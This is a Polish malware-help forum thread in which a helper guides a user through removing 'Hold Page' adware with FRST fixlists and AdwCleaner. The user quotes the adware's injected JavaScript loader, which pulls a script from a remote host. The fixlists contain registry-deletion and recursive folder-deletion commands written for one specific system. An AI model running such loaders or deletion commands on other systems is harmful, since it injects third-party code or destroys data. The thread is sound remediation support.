Skocz do zawartości

Nagłe pojawienie się reklam "Hold Page Ads" podczas przeglądania stron internetowych


Rekomendowane odpowiedzi

Cześć.

 

Przedwczoraj podczas pracy z programem Windows Live Movie Maker wpadłem na "genialny" pomysł, aby pobrać na swój komputer program Windows Movie Maker. Program ściągnąłem ze strony Microsoftu. Jednak po zainstalowaniu i spróbowaniu włączenia tego programu pojawił się komunikat, że albo mój komputer nie spełnia minimalnych wymagań, albo należy zaktualizować sterowniki karty graficznej. Postanowiłem więc poprzez program Windows Update znaleźć nowe aktualizacje dla komputera, przy tym również zaktualizowałem kartę graficzną. Wciąż nie dawało to jednak oczekiwanego rezultatu. Zdecydowałem się więc na przywrócenie systemu do momentu przed instalacją programu Windows Movie Maker.

Wczoraj natomiast postanowiłem na nowo uruchomić program Windows Live Movie Maker (wraz z przywróceniem systemu program pojawił się na nowo). Jednak pojawił się komunikat, że nie można programu uruchomić. Aby problem rozwiązać należy program usunąć, a następnie pobrać go ze strony Microsoftu i na nowo zainstalować. Jako że ze strony Microsoftu mogłem pobrać tylko pakiet z programem Windows Movie Maker, który założyłem, że i tak nie będzie działał, postanowiłem pobrać program z innej strony. I tak oto pobrałem dwa programy - Windows Movie Maker oraz Windows Live Movie Maker (oba z różnych, nie Microsoft`owskich stron). Oczywiście zainstalowałem oba, działają do tej pory. Jednak po chwili odpaliłem przeglądarkę Google Chrome i po załadowaniu się strony startowej, z lewej strony jak i w dole ekranu zaczęły pojawiać się okienka reklamowe z dopiskiem "Hold Page Ads". Wyświetlają się one również jako jednolity tekst podczas wyszukiwania haseł w google. Ponadto strony wolno się ładowały, a niekiedy w pasku adresu, przy odświeżaniu, zamiast adresu strony pojawia się taki ciąg znaków (ten akurat pojawił się podczas odświeżania strony wp.pl):

 

"javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head");if(a.length){var d=document.createElement("script");d.src="hxxps://apiholdingmypage-a.akamaihd.net/gsrs?is=isgiwhPL&bp=BA&g=3fe66a11-c1c0-4b84-a5ed-ef1cc0fbc4c3";a[0].appendChild(d);}}}catch(e){}"

 

Program antywirusowy Avast, podczas wykonywania skanowania, nie znalazł na komputerze niczego podejrzanego.

 

Przyznam się od razu, że za namową brata, uruchomiłem później (ok. 1 w nocy) na komputerze program ComboFix. Dopiero w dniu dzisiejszym znalazłem to forum i przeczytałem, aby jednak tego nie robić :P

 

Mam nadzieję, że uda mi się uzyskać od kogoś choć odrobinę pomocy.

 

Mój system - Windows 7 64-bit.

 

Logi wykonane dzisiejszego popołudnia:

 

GMER.txtExtras.TxtFRST.txtOTL.TxtShortcut.txtAddition.txt

Odnośnik do komentarza
Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.

I tak oto pobrałem dwa programy - Windows Movie Maker oraz Windows Live Movie Maker (oba z różnych, nie Microsoft`owskich stron). Oczywiście zainstalowałem oba, działają do tej pory. Jednak po chwili odpaliłem przeglądarkę Google Chrome i po załadowaniu się strony startowej, z lewej strony jak i w dole ekranu zaczęły pojawiać się okienka reklamowe z dopiskiem "Hold Page Ads".

To co pobrałeś to nie był instalator docelowy właściwy tylko downloader portalowy. I wygląda na to, że załatwił Cię portal dobreprogramy.pl. Na dysku widać sekwencję przeprowadzoną w ciągu dwóch minut: pobranie "Asystenta pobierania" dobrychprogramów > utworzenie folderu adware "Hold Page":

 

2014-11-30 21:42 - 2014-11-30 21:42 - 00000000 ____D () C:\Program Files (x86)\Movie Maker 2.6

2014-11-30 21:39 - 2014-11-30 21:48 - 00000000 ____D () C:\Program Files (x86)\Hold Page

2014-11-30 21:39 - 2014-11-30 21:39 - 07364096 _____ () C:\Users\DOM\Downloads\MM26_PL(dobreprogramy.pl).msi

2014-11-30 21:37 - 2014-11-30 21:38 - 00754240 _____ ( ) C:\Users\DOM\Downloads\Windows-Movie-Maker(11546)-dp.exe

 

Więcej na temat tego rodzaju działań: KLIK.

 

 

Przyznam się od razu, że za namową brata, uruchomiłem później (ok. 1 w nocy) na komputerze program ComboFix. Dopiero w dniu dzisiejszym znalazłem to forum i przeczytałem, aby jednak tego nie robić

Nie podałeś raportu, który utworzył ComboFix. ComboFix nie jest dobrym programem do usuwania tego typu rzeczy, nie ruszył w ogóle adware. Za to w systemie zostały dorobione sztuczne obiekty np. nieistniejąca na edycjach Home usługa AppMgmt (ComboFix nie jest wolny od błędów i w systemie mogą się pojawić po "resetach" rzeczy, których uprzednio w Windows nie było).

 

 


Przeprowadź następujące działania:

 

1. Przez Panel sterowania odinstaluj: Hold Page, Freecorder 7 Applications, Freecorder extension, Freecorder extension for Chrome, Freecorder extension x64, McAfee Security Scan Plus. Na temat Freecorder: KLIK.

 

2. Otwórz Notatnik i wklej w nim:

 

R1 {df47b99d-26f5-45f4-85c5-97b4da365f21}Gw64; C:\Windows\System32\drivers\{df47b99d-26f5-45f4-85c5-97b4da365f21}Gw64.sys [48776 2014-11-29] (StdLib)
U5 AppMgmt; C:\Windows\system32\svchost.exe [27648 2011-03-01] (Microsoft Corporation)
S3 catchme; \??\C:\1234aa.exe168021\catchme.sys [X]
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction 
HKU\S-1-5-21-1480235242-2075340924-4091109271-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction 
HKU\S-1-5-21-1480235242-2075340924-4091109271-1001\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-1480235242-2075340924-4091109271-1001\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.wp.pl/
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM-x32 -> {CAAF45EA-FED9-4150-A588-64A3DD21CE05} URL = http://startsear.ch/?aff=1&src=sp&cf=078e0ab0-9927-11e1-bb33-dca971544231&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1480235242-2075340924-4091109271-1001 -> {CAAF45EA-FED9-4150-A588-64A3DD21CE05} URL = http://startsear.ch/?aff=1&src=sp&cf=078e0ab0-9927-11e1-bb33-dca971544231&q={searchTerms}
Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - No File
Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - No File
CustomCLSID: HKU\S-1-5-21-1480235242-2075340924-4091109271-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\DOM\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1480235242-2075340924-4091109271-1001_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\DOM\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1480235242-2075340924-4091109271-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\DOM\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1480235242-2075340924-4091109271-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\DOM\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll No File
Task: {108BEE63-2766-4082-94F9-A61E192C52BD} - System32\Tasks\{B7E75CE9-1262-4690-AA0A-5B03EA04AA5B} => D:\PowerPoint\Microsoft Office PowerPoint 2007 PL.exe
Task: {27D837BC-2143-491D-AAB6-043871D9C48A} - System32\Tasks\{A749C1FF-4F43-4E34-8BB2-9E0759156C2F} => D:\PowerPoint\Microsoft Office PowerPoint 2007 PL.exe
Task: {56C2E152-8EE1-4DF0-B489-E3118A984267} - System32\Tasks\{B1419125-866F-4406-8442-C3CA4BF07D48} => D:\NARUTOSGNTS\GAME.exe
Task: {5A1E3B8E-1DD6-4885-A917-1AF56E4BDD58} - System32\Tasks\{E0BAC9A1-853D-4B28-B3A8-4814E0F48583} => C:\PROGRAMY\SubEdit-Player\subedit.exe
Task: {78C543BB-5491-46F2-B572-B618DDB772C4} - System32\Tasks\Symantec\Norton Error Analyzer 18.6.0.29 => C:\Program Files (x86)\Norton Internet Security\Engine\18.6.0.29\SymErr.exe
Task: {8FD4B633-27C6-4D34-904B-870C7AC40493} - System32\Tasks\{8E82E1DF-2265-4724-9017-FBDF336CF588} => D:\SpellForce - Cień Feniksa\spellforce.exe
Task: {AFA14807-B62A-44BB-98BB-5394FC2D9302} - System32\Tasks\{64097DB9-622C-4BED-A5F5-946A01432E4B} => D:\NARUTOSGNTS\Dolphin.exe
Task: {CC3B5B95-0F13-4475-AC8E-CB14D3680AA5} - System32\Tasks\EasyPartitionManager => C:\Windows\MSetup\BA46-12225A02\EPM.exe
Task: {CC94F45D-CB75-4B11-B3B7-CE2E3CA684B0} - System32\Tasks\{3844D976-0EC0-498F-9D35-5DA155B9BDEF} => D:\NARUTOSGNTS\GAME.exe
Task: {D3A1BC40-F056-4BA3-B1CE-AFE331FF2774} - System32\Tasks\Symantec\Norton Error Processor 18.6.0.29 => C:\Program Files (x86)\Norton Internet Security\Engine\18.6.0.29\SymErr.exe
Task: {D632650A-7DB2-49F0-AFD0-6E6E31BA5068} - System32\Tasks\{280B954B-E01B-4065-B48E-30F2D5F04042} => D:\NARUTOSGNTS\Dolphin.exe
Task: {DADCEB1A-04AA-4007-BC0E-A6B622E9928D} - System32\Tasks\{1A45A83B-276F-46FB-8DF6-E3587F1EA7DD} => D:\Sniper Elite III\Sniper Elite 3\bin\SniperElite3.exe
Task: {E73E0127-3400-4A10-8C53-34120909C727} - System32\Tasks\{D46EF293-11F6-406A-A7F4-140C0A7D2BBF} => D:\SpellForce - Cień Feniksa\spellforce.exe
Task: {E7F3B44A-8828-4797-804E-3A60B5B45784} - System32\Tasks\{1D3E57E1-D932-47F5-B65F-65A564596CB6} => D:\SpellForce - Cień Feniksa\spellforce.exe
CHR HKLM-x32\...\Chrome\Extension: [ejpbbhjlbipncjklfjjaedaieimbmdda] - C:\Users\DOM\AppData\Local\CRE\ejpbbhjlbipncjklfjjaedaieimbmdda.crx [2013-02-03]
CHR HKLM-x32\...\Chrome\Extension: [gpicboiclhmnllnjdcfcffifpoaebgkm] - C:\Program Files (x86)\Freecorder extension\Freecorder.crx [2012-10-13]
FF Plugin HKU\S-1-5-21-1480235242-2075340924-4091109271-1001: ubisoft.com/uplaypc -> C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll No File
C:\Program Files\Freecorder extension x64
C:\Program Files (x86)\Freecorder extension
C:\Program Files (x86)\Hold Page
C:\Users\DOM\AppData\Local\CRE
C:\Users\DOM\AppData\Local\Google\Chrome\User Data\Default\Local Storage\*localstorage*
C:\Users\DOM\AppData\Local\WMTools Downloaded Files
C:\Users\DOM\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Norton
C:\Users\DOM\AppData\Roaming\Thinstall
C:\Users\DOM\Downloads\*(*)-dp*.exe
C:\Users\DOM\Downloads\Niepotwierdzony*.crdownload
C:\Users\DOM\Downloads\wlsetup*.exe
C:\Users\UpdatusUser\Desktop\*.lnk
C:\Windows\System32\drivers\{df47b99d-26f5-45f4-85c5-97b4da365f21}Gw64.sys
Reg: reg delete "HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main" /f
Reg: reg delete "HKU\S-1-5-21-1480235242-2075340924-4091109271-1000\Software\Microsoft\Internet Explorer\SearchScopes" /f
Reg: reg delete HKU\S-1-5-21-1480235242-2075340924-4091109271-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f
Reg: reg delete HKU\S-1-5-21-1480235242-2075340924-4091109271-1000\Software\Microsoft\Windows\CurrentVersion\Run /f
Reg: reg delete "HKU\S-1-5-21-1480235242-2075340924-4091109271-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome" /f
CMD: for /d %f in (C:\Users\DOM\AppData\Local\{*}) do rd /s /q "%f"
CMD: dir /a "C:\Program Files"
CMD: dir /a "C:\Program Files (x86)"
CMD: dir /a C:\ProgramData
CMD: dir /a C:\Users\DOM\AppData\Local
CMD: dir /a C:\Users\DOM\AppData\LocalLow
CMD: dir /a C:\Users\DOM\AppData\Roaming

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

3. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt oraz C:\ComboFix.txt.

 

 

 

 

.

Odnośnik do komentarza

Wszystkie podane przez Panią oprogramowania zostały odinstalowane (jedynie podczas usuwania Freecorder 7 Applications w połowie procesu pojawił się komunikat, że program przestał działać (wyglądało tak, jakby się zawiesił; mimo wszystko zniknął on z listy programów, więc zakładam, że został odinstalowany)).

 

Ponownie zrobione logi:

FRST.txtAddition.txtFixlog.txt

 

Dodatkowo ComboFix.txt z dnia 01.12:

ComboFix.txt

Odnośnik do komentarza

Operacje przetworzone jak należy, ale pojawiły się nagle dodatkowe elementy (adware Hold Page uwidoczniło się w Google Chrome). Poprawki:

 

1. Otwórz Notatnik i wklej w nim:

 

CloseProcesses:
GroupPolicy: Group Policy on Chrome detected 
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction 
BHO-x32: No Name -> {6c14185e-4de6-4a79-985b-19f23fd1e638} -> No File
BHO-x32: No Name -> {B15BBE59-42F5-4206-B3F0-BE98F5DC4B93} -> No File
S2 Update Hold Page; "C:\Program Files (x86)\Hold Page\updateHoldPage.exe" [X]
C:\Program Files (x86)\Temp
C:\ProgramData\InstallMate
C:\ProgramData\McAfee
C:\ProgramData\Norton
C:\ProgramData\NortonInstaller
C:\ProgramData\SoftSafe
C:\ProgramData\Temp
C:\ProgramData\{*}.log
C:\Users\DOM\AppData\Local\Freecorder 7 Audio
C:\Users\DOM\AppData\Local\Freecorder 7 Converter
C:\Users\DOM\AppData\Local\Freecorder 7 Video
C:\Users\DOM\AppData\LocalLow\Adblock Pro
C:\Users\DOM\AppData\LocalLow\Conduit
C:\Users\DOM\AppData\Roaming\Freecorder 7 Audio
C:\Users\DOM\AppData\Roaming\Freecorder 7 Converter
C:\Users\DOM\AppData\Roaming\Freecorder 7 Video
C:\windows\System32\Tasks\Symantec
EmptyTemp:

 

Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

2. W Google Chrome:

  • Ustawienia > karta Rozszerzenia > odinstaluj Hold Page
  • Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Zresetuj ustawienia przeglądarki. Zakładki i hasła nie zostaną naruszone, ale używane rozszerzenie Avast zostanie wyłączone (aktywuj ponownie w opcjach).
  • Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz.
3. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

 

 

 

.

Odnośnik do komentarza

Gdy po zresetowaniu się komputera włączyłem Google Chrome, pojawiła się informacja, że "wyłączono nieobsługiwane rozszerzenie - aby poprawić bezpieczeństwo Chrome, wyłączyliśmy niektóre rozszerzenia niedostępne w Chrome Web Store, które mogły zostać dodane bez Twojej wiedzy - Hold Page". Po wejściu w rozszerzenia faktycznie był on wyłączony, po kliknięciu na śmietnik zniknął.

 

Nowe logi:

 

Fixlog.txtFRST.txt

Odnośnik do komentarza

Zadany Fix powtórzony więcej niż raz (co jest bez sensu - nie zostanie przetworzone ponownie to samo), to log z trzeciego podejścia (powinna być to runda numer 2):

 

Ran by DOM at 2014-12-02 14:04:28 Run:3

 

Co się działo podczas próby właściwej, że uruchamiałeś Fix ponownie?

 

Poza tym zawirowaniem wszystko zrobione. Teraz uruchom AdwCleaner. Wybierz opcję Szukaj i dostarcz wynikowy log z folderu C:\AdwCleaner.

Odnośnik do komentarza

Przy włączeniu FRST i kliknięciu Fix rozpoczął się proces, jednak po chwili znów wyskoczyło okienko, że program przestał działać (wyglądał tak, jakby się zawiesił) - identycznie jak przy usuwaniu wcześniej programu Freecorder 7 Applications. Dlatego, po kliknięciu w jedyną opcję "zamknij program", uruchomiłem go jeszcze raz i powtórzyłem proces.

AdwCleanerR0.txt

Odnośnik do komentarza

Kończymy:

1. Uruchom AwCleaner ponownie, tym razem zastosuj kombinację Szukaj + Usuń. Log nie jest mi potrzebny.

2. Odinstaluj w poprawny sposób ComboFix. Klawisz z flagą Windows + R i w polu Uruchom wklej komendę:

C:\Users\DOM\Desktop\1234aa.exe.exe /uninstall

3. Usuń ręcznie pobrane narzędzia z C:\Users\DOM\Desktop\scnay. Następnie zastosuj DelFix.
 

Odnośnik do komentarza

Krok 1. wykonany bezproblemowo.

 

Jednak nie mogę usunąć ComboFix. Po wpisaniu komendy, którą Pani podała, otwiera się okno, program tak jakby się ładuje (rozpakowuje coś etc.) i otwiera się kolejne okno, w którym jest informacja, że program tworzy punkt przywracania systemu, a następnie przechodzi do autoscanowania... 

Odnośnik do komentarza

Po wpisaniu komendy, którą Pani podała, otwiera się okno, program tak jakby się ładuje (rozpakowuje coś etc.) i otwiera się kolejne okno, w którym jest informacja, że program tworzy punkt przywracania systemu, a następnie przechodzi do autoscanowania...

Czy na pewno wkleiłeś moją komendę a nie wpisywałeś ręcznie? A jeśli wpisywałeś ręcznie, to czy na pewno tu jest:

 

C:\Users\DOM\Desktop\1234aa.exe.exe/uninstall

 

A nie tu:

 

C:\Users\DOM\Desktop\1234aa.exe.exe/uninstall

 

?

Odnośnik do komentarza
Gość
Ten temat został zamknięty. Brak możliwości dodania odpowiedzi.
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...